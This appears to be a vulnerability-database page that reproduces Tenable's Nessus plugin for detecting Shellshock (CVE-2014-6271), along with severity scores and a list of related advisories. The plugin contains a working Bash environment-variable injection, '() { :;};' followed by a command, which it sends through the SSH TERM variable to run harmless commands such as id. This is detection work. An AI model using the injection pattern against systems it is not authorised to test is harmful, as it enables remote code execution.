Lucene search
This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.BASH_REMOTE_CODE_EXECUTION.NASLHistorySep 24, 2014 - 12:00 a.m.
Bash Remote Code Execution (Shellshock)
2014-09-2400:00:00
This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
474
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.976 High
EPSS
Percentile
100.0%
The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.
#TRUSTED 3a00155c50df40ea74cd049d0b9aa21033d7b42fd3dee78082ef4dbe38b20a50e8299adcd54ff5a43115cf46f1b5f19e2facd9250464ef283c3afd0ce04ef898d09cd9cb64b231bca628242b7565cdb4d6883d5c3d9ce0eda79f20f6a6f4b11c1b40a6ce1c32ef3fe3ee6194c43ba63261e8b016f773a8e310d00c84cd266ead3fe62bb568b4d4a5957ff1771ce6696222d5af13e344737427fff45ed7375ef0e08cbc7a9f726c62a82cf5ddd443d8e34f67e3dc1dc742e4dfa14886e9393bac6d5ed1eb7f33f8ea8a2bad1756a65fb1d127e1d5366d578afdad8ccea5928888438309eb0d34981b7491b47ddb98ffa034b929139dd8393fa9c0f3fd3400dec42494c2dd0e6331bbba307717d65ea1331e83eaa3a77e0cc3a04a6af644e0cf0073045a1cd874eae809c637c9758e3307af08b27a15c8c224127f7a1adaba70280c127efa8a1dea6a946ae5c52d4df1cbc8ff2beb4eab4dbe0c81b73d2314b66b008e236d0bea64272082c337ef40996e6c830a34b717507c29e47c1cf2bde451cdcbe99ef4b81571473325b334c723862c5d788c6978af7325c4648926eb2f6b84310213e47c43d088eec4cf0561036fca5f93fc285d4bc03dea5bfc42328c01869ff62f10b413a6e288e9a14d5bcbce824facbbb9c6b30438bb0db7aa2b9932f3957b8bd5b5096c7e6ef36efc21fe5dbea86fa974188c375807a843e9103963
#TRUST-RSA-SHA256 877eeea72f8bc94f75156d7d7bca0d3bdd71cff7ed17f2c5dd95882c02a7addd85f344b4ddaaa31740ba44b373e6a88fb1ef766330a2b3418ecb08c3532464c6827816e9855a64e1b2abedf2e70595b32e4728501e05ee733144155cb387046b0603b64a375ba3868728717742e5d79edf328b4726f9ea5185a51b694e62604de6428a54515066c1a4c0d10d609ba031548fdead98b9f7a8e26fa8a71e3e8582b7d95c59c53786df523bc3b4a409f7170046e35aec884dabdb2fc445059f74e410860def3166a961a111eecedb3757f6b2f2e49caaddf827a13c52c8be8dc3d8f8e70963e690d17f1092d9250f134b05d6ad543223bfc165127d637a9897d0c7652a51cd0c734917b848a6616b8560a50d02efac5ce778206fcfc727873710382deeb185c0ad29afd10900e23c701319894b7d59188c9543330bd25e657c8371fe2c5781b77003da161689b5bf106d867b65e6c8366d2e346c6cd5a9967824ca33ef7aa1c4364bb44d3e63a341b339353f0f6d9a4df5cda2b6629ea51be8e8a5513dd662065181b417bb399bfda3bd66f9892b080e6afd518ca4ce7377fd2d9b1c23304d2a0e8ea9b92a507f74fb782f1d06c07b6ed7ac6c1a121e4811a335265dd1044dec1ef7be2079b77a56c854fac287cf72678b2140730cf7800f19c131beb17efee18273db6ddadf130a0135613f6d66e3bac0dccf156c9b57035fdf45
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
script_id(77823);
script_version("1.30");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");
script_cve_id("CVE-2014-6271");
script_bugtraq_id(70103);
script_xref(name:"EDB-ID", value:"34765");
script_xref(name:"EDB-ID", value:"34766");
script_xref(name:"IAVA", value:"2014-A-0142");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/07/28");
script_xref(name:"CEA-ID", value:"CEA-2019-0240");
script_name(english:"Bash Remote Code Execution (Shellshock)");
script_set_attribute(attribute:"synopsis", value:
"A system shell on the remote host is vulnerable to command injection.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of Bash that is vulnerable to
command injection via environment variable manipulation. Depending on
the configuration of the system, an attacker could remotely execute
arbitrary code.");
script_set_attribute(attribute:"see_also", value:"http://seclists.org/oss-sec/2014/q3/650");
# https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dacf7829");
script_set_attribute(attribute:"see_also", value:"https://www.invisiblethreat.ca/post/shellshock/");
script_set_attribute(attribute:"solution", value:
"Update Bash.");
script_set_attribute(attribute:"agent", value:"unix");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-6271");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/09/24");
script_set_attribute(attribute:"patch_publication_date", value:"2014/09/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/09/24");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:gnu:bash");
script_set_attribute(attribute:"stig_severity", value:"I");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_ports("Services/ssh", 22);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("ssh_func.inc");
include("telnet_func.inc");
include("hostlevel_funcs.inc");
include("misc_func.inc");
include("data_protection.inc");
port = get_service(svc:"ssh", default:22, exit_on_fail:TRUE);
if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);
ret = ssh_open_connection();
if (!ret) audit(AUDIT_SOCK_FAIL, port, "SSH");
info_t = INFO_SSH;
filename = "nessus." + unixtime();
test_command = "echo Plugin output: $((1+1))";
term = "() { :;}; " + test_command + " > /tmp/" + filename;
command = "bash -c 'cat /tmp/" + filename + "'";
output = ssh_cmd(cmd:command, term:term, noexec:TRUE);
# attempt cleanup
cleanup = "rm /tmp/" + filename;
ssh_cmd(cmd:cleanup);
if ("Plugin output: 2" >!< output)
{
if(info_t == INFO_SSH) ssh_close_connection();
audit(AUDIT_HOST_NOT, "affected.");
}
test_command = "/usr/bin/id";
term2 = "() { :;}; " + test_command + " > /tmp/" + filename;
command = "bash -c 'cat /tmp/" + filename + "'";
output2 = ssh_cmd(cmd:command, term:term2, noexec:TRUE);
# attempt cleanup
cleanup = "rm /tmp/" + filename;
ssh_cmd(cmd:cleanup);
if(info_t == INFO_SSH) ssh_close_connection();
if (output2 =~ "uid=[0-9]+.*gid=[0-9]+.*")
{
term = term2;
output = output2;
}
report =
'\n' + 'Nessus was able to set the TERM environment variable used in an SSH' +
'\n' + 'connection to :' +
'\n' +
'\n' + term +
'\n' +
'\n' + 'and read the output from the file :' +
'\n' +
'\n' + data_protection::sanitize_uid(output:output) +
'\n' +
'\n' + 'Note: Nessus has attempted to remove the file /tmp/' + filename + '\n';
security_report_v4(
port : port,
severity : SECURITY_HOLE,
extra : report
);
Related
saint
saint
Bash Environment Variable Handling Shell Command Injection Via CUPS
2014-11-05 00:00:00
Bash Environment Variable Handling Shell Command Injection Via CUPS
2014-11-05 00:00:00
ShellShock DHCP Server
2014-11-20 00:00:00
packetstorm
packetstorm
Advantech Switch Bash Environment Variable Code Injection
2015-12-02 00:00:00
TrendMicro InterScan Web Security Virtual Appliance Shellshock
2016-10-22 00:00:00
Shellshock Bashed CGI RCE
2014-10-03 00:00:00
nessus
nessus
Ubuntu 14.04 LTS : Bash vulnerability (USN-2362-1)
2014-09-25 00:00:00
Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)
2014-09-26 00:00:00
SuSE 11.3 Security Update : bash (SAT Patch Number 9740)
2014-09-25 00:00:00
hackerone
hackerone
gentoo
gentoo
Bash: Code Injection
2014-09-24 00:00:00
myhack58
myhack58
openvas
openvas
CentOS Update for bash CESA-2014:1293 centos5
2014-09-25 00:00:00
GNU Bash Environment Variable Handling RCE Vulnerability (Shellshock, Linux/Unix SSH Login, CVE-2014-6271) - Active Check
2014-09-26 00:00:00
SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)
2015-10-16 00:00:00
amazon
amazon
Critical: bash
2014-09-24 07:48:00
zdt
zdt
FutureNet NXR-G240 Series ShellShock Command Injection Exploit
2018-12-08 00:00:00
DHCP Client Bash Environment Variable Code Injection Exploit
2014-09-26 00:00:00
PHP 5.x - Bypass Disable Functions Vulnerability
2014-11-17 00:00:00
exploitpack
exploitpack
centos
centos
bash security update
2014-09-24 15:07:20
ubuntu
ubuntu
Bash vulnerability
2014-09-24 00:00:00
seebug
seebug
IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit
2014-10-10 00:00:00
GNU bash Environment Variable Command Injection (MSF)
2014-09-29 00:00:00
OpenVPN 2.2.29 - ShellShock Exploit
2014-10-10 00:00:00
slackware
slackware
[slackware-security] bash
2014-09-29 19:33:36
[slackware-security] bash
2014-09-24 23:37:00
fedora
fedora
[SECURITY] Fedora 21 Update: bash-4.3.22-3.fc21
2014-09-27 10:03:24
[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
2014-09-26 09:03:00
[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21
2014-09-27 10:08:26
debian
debian
[SECURITY] [email protected]
2014-09-24 15:22:27
[SECURITY] [email protected]
2014-09-24 15:22:47
[SECURITY] [DSA 3032-1] bash security update
2014-09-24 14:06:06
metasploit
metasploit
IPFire Bash Environment Variable Injection (Shellshock)
2016-05-30 00:40:12
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
2015-12-01 17:33:45
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
2014-09-25 06:19:14
cisa_kev
cisa_kev
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
osv
osv
bash - security update
2014-09-24 00:00:00
bash - security update
2014-09-25 00:00:00
securityvulns
securityvulns
[USN-2362-1] Bash vulnerability
2014-09-25 00:00:00
Cisco Unified Communications Manager Multiple Vulnerabilities (VP2015-001)
2015-08-17 00:00:00
Re: [oss-security] CVE-2014-6271: remote code execution through bash
2014-09-25 00:00:00
mageia
mageia
Updated bash packages fix CVE-2014-6271
2014-09-24 22:42:05
oraclelinux
oraclelinux
bash security update
2014-09-24 00:00:00
bash security update
2014-09-24 00:00:00
redhat
redhat
(RHSA-2014:1293) Critical: bash security update
2014-09-24 00:00:00
(RHSA-2014:1294) Critical: bash security update
2014-09-24 00:00:00
(RHSA-2014:1295) Critical: bash Shift_JIS security update
2014-09-24 00:00:00
suse
suse
Security update for bash (critical)
2014-09-27 01:04:16
Important security fix for bash that allows the injection of commands. (important)
2014-09-28 12:09:20
bash (critical)
2014-09-30 17:06:26
thn
thn
threatpost
threatpost
Patching Bash Vulnerability a Challenge for ICS, SCADA
2014-09-25 14:34:38
Bash Botnet Exploit Found, Bash Patches Incomplete
2014-09-25 11:41:51
kitploit
kitploit
xShock - Shellshock Exploit
2020-03-19 11:30:00
exploitdb
exploitdb
freebsd
freebsd
bash -- remote code execution vulnerability
2014-09-24 00:00:00
debiancve
debiancve
CVE-2014-7169
2014-09-25 01:55:04
attackerkb
attackerkb
CVE-2014-7169
2014-09-25 00:00:00
cvelist
cvelist
CVE-2014-7169
2014-09-25 01:00:00
prion
prion
Design/Logic Flaw
2015-01-13 11:59:00
ubuntucve
ubuntucve
CVE-2014-7169
2014-09-25 00:00:00
CVE-2014-6271
2014-09-24 00:00:00
hp
hp
cve
cve
CVE-2014-62771
2022-10-03 16:20:32
CVE-2014-6271
2014-09-24 18:48:04
impervablog
impervablog
Log4j: One Year Later
2022-12-09 12:38:39
cloudfoundry
cloudfoundry
CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry
2014-09-25 00:00:00
lenovo
lenovo
GNU Bourne-Again Shell (Bash) 'Shellshock' - Lenovo Support US
2016-11-16 00:00:00
ibm
ibm
veracode
veracode
Arbitrary File Overwrite
2019-01-15 09:02:02
nvd
nvd
CVE-2014-6271
2014-09-24 18:48:04
CVE-2014-7169
2014-09-25 01:55:04
archlinux
archlinux
bash: Remote code execution
2014-09-26 00:00:00
nuclei
nuclei
ShellShock - Remote Code Execution
2020-10-01 18:03:35
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.976 High
EPSS
Percentile
100.0%
Related for BASH_REMOTE_CODE_EXECUTION.NASL